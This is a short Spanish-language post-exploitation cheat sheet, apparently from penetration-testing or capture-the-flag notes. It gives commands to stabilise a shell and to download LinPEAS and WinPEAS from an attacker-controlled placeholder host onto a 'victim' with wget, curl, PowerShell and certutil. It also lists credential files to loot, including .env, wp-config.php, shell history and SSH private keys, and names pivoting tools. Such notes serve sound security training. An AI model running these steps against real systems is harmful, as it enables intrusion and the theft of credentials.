Appearance
👑 Post-Explotación
Ya estás dentro. ¿Ahora qué?
1. Estabilizar la Shell
No pierdas tu acceso por un Ctrl+C.
bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg2. Escalada de Privilegios
El siguiente paso lógico es conseguir el control total.
- 🐧 Guía de Escalada en Linux
- Sudo, SUID, Cron Jobs, Kernel Exploits.
- 🪟 Guía de Escalada en Windows
- Privilegios (SeImpersonate), Servicios, Registro.
3. Transferencia de Archivos
Cómo mover herramientas (LinPEAS, exploits) a la máquina víctima.
Desde tu máquina (Atacante)
Levanta un servidor web:
bash
python3 -m http.server 80En la víctima (Descarga)
- Linux (wget/curl):bash
wget http://<TU_IP>/linpeas.sh curl http://<TU_IP>/linpeas.sh -o linpeas.sh - Windows (PowerShell/Certutil):powershell
iwr -uri http://<TU_IP>/winpeas.exe -OutFile winpeas.execmdcertutil -urlcache -split -f http://<TU_IP>/winpeas.exe winpeas.exe
4. Looting (Saqueo)
Antes de irte, busca información sensible.
- Archivos de Configuración:
wp-config.php,config.php,.env. - Historial:
.bash_history,ConsoleHost_history.txt. - Llaves SSH:
~/.ssh/id_rsa. - Credenciales de BD: Cadenas de conexión en scripts.
5. Pivoting
Saltar a otras máquinas de la red interna.
- Chisel
- Ligolo-ng